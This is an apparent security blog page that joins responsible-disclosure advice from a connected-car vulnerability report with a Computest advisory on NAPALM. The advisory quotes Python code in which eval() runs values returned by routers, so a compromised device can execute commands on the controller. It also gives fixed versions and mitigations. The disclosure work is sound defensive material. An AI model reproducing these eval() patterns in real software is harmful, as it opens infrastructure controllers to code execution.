  • It is common practice, especially in the field of electronics, to purchase components from a third party. That does not clear the manufacturer from the responsibility for their quality and security; these components need to be included in thorough quality assurance. The company selling the completed product should be prepared to take responsibility for its security and quality.
  • Even the best quality control cannot prevent mistakes from being made. In such an event, manufacturers should stand to their responsibility and communicate swiftly and with transparency to affected customers. Hiding cannot only lead to damages on the customer side, but can also have a very negative impact on the manufacturers reputation.
  • Ethical hackers should not be considered as a threat, but as a help to identify existing vulnerabilities. These people often have different views and approaches, enabling them to find vulnerabilities which otherwise would remain undiscovered. Such identified vulnerabilities are important to improve the product quality.
  • Every manufacturer should have a Responsible Disclosure Policy (RDP) stating clearly how external people can report discovered vulnerability in a safe environment. Ethical hackers should not be threatened but encouraged to disclose findings to the manufacturer. See also ‘NCSC Leidraad Responsible Disclosure’ .

Recommendations for consumers

  • Having an internet-connected car brings a number of advantages mostly for consumers. But be aware that this applied technology is still early in its lifecycle and therefore not fully mature yet in terms of quality and security.
  • This can be associated with the possibility to relatively easy get remote access to your car. Although it is very unlikely that this can impact driving behaviour, it might provide access to personal data stored in the car entertainment system and/or your smart phone.
  • Become informed: ask about quality and security standards of car you are looking into as much as you do that for aspects like crash tests. Specifically ask about the remote maintenance possibilities and how long the manufacturer would maintain the software used in the car (support period). If you want to protect yourself against remote threats, please ask your dealer to install updates during their normal service schedule
  • Keep the software in your car up to date where you have the possibility.
  • This does not only apply to cars, but to all IoT devices such as baby monitors, smart TV’s and home automation.

Recommendations for ethical hackers

  • Identifying and disclosing a vulnerability is not about a personal victory or trophy for the hacker, but a responsibility to contribute to safer and better IT systems.
  • In case you have identified a vulnerability, don’t go further than necessary and make sure you don’t harm anybody.
  • Inform the owner / manufacturer of the identified vulnerability first immediately and do not share related information with the press or any other third party. Look for a responsible disclosure policy (RDP) on the website of the manufacturer and follow the policy. In case you can’t find such a RDP, contact the manufacturer (anonymously) and ask for such a policy to help protect your integrity. A good alternative way is to look for a whistle-blower policy and contact the manufacturer this way.
  • Beware that what may look like a simple fix from your perspective as an engineer, can be something completely different in a manufacturing world when applied to the scale of hundreds of thousands of vehicles. Have some patience and empathy for the situation you’re putting the manufacturer in, even though you may be right to do so.
  • It is important to understand the legal regulations relevant for potential research and investigation activities. Different national legislations and limited relevant jurisdiction does not make that easy. Keep in mind: having no criminal intention does not give a free ride to break the law. In case of doubt seek legal advice upfront!

Letter from Volkswagen

Below the letter from Volkswagen we received on April 17 2018. The letter is from the department we have been in contact with from the start of the disclosure process

NAPALM - command execution on NAPLM controller from host

12 July 2017 at 00:00

During a summary code review of NAPALM, Computest found and exploited several issues that allow a compromised host to execute commands on the NAPALM controller and thus gain access to the other hosts controlled by that controller.

This was not a full audit and further issues may or may not be present.


NAPALM (Network Automation and Programmability Abstraction Layer with Multivendor support) is a Python library that implements a set of functions to interact with different router vendor devices using a unified API.

NAPALM supports several methods to connect to the devices, to manipulate configurations or to retrieve data.

(Taken from their README)

Technical Background

A big threat to a configuration management system like NAPALM, Ansible, Salt Stack and others is compromise of the central node, or controller. If the controller is compromised, an attacker has unfettered access to all hosts that are controlled by the controller. As such, in any deployment, the central node receives extra attention in terms of security measures and isolation, and threats to this node are taken even more seriously.

Issue: Unsafe eval() when validating configurations

The validator allows for a number comparison using < and >. This is handled by the compare_numeric() function in napalm-base/ The function assumes that the value that is retrieved from the router is also a number and continues to use the eval() function for the actual comparison. However, a compromised device can of course also return an arbitrary string, which will be evaluated.

def compare_numeric(src_num, dst_num):
    """Compare numerical values. You can use '<%d','>%d'."""
    complies = eval(str(dst_num)+src_num)
    if not isinstance(complies, bool):
        return False
    return complies

Issue 2: Unsafe eval() in the IOS XR driver

The eval() function is also used quite extensively in the IOS XR driver. Its use case seems to be to transform a string, from the API, which contains true or false to a Python boolean. When the router is compromised however, the string could contain an arbitrary value that is passed to the eval() function. The difficulty in exploiting this would be that the value is first passed to the title() function before it is evaluated as Python code. The title() function capitalizes the first character of each word in a string.

For example:

multipath = eval((napalm_base.helpers.find_txt(
                bgp_group, 'NeighborGroupAFTable/NeighborGroupAF/Multipath') or 'false').title())



Users that are unable to update, can mitigate the issues by not using the < or < validation options and not use the IOS XR driver.


Users can update to version 0.24.3 of napalm-base and 0.5.3 of napalm-iosxr, which fixes these vulnerabilities.


We have taken the liberty to transform this vulnerability into a CTF challenge for SHA2017. Exploitation is left as an exercise for the reader:

#!/usr/bin/env python2



The NAPALM project assumes that all nodes are playing nice. However, this assumption does not hold in a situation where a node is compromised. The project would benefit from a more defensive programming style, were values that are returned from a node are considered hostile and addressed accordingly.

We would like to thank the developers of NAPALM for their quick response. The mentioned vulnerabilities were fixed within 2 hours after our initial email!


2017-07-12 First contact with NAPALM developers
2017-07-12 NAPALM released a fix
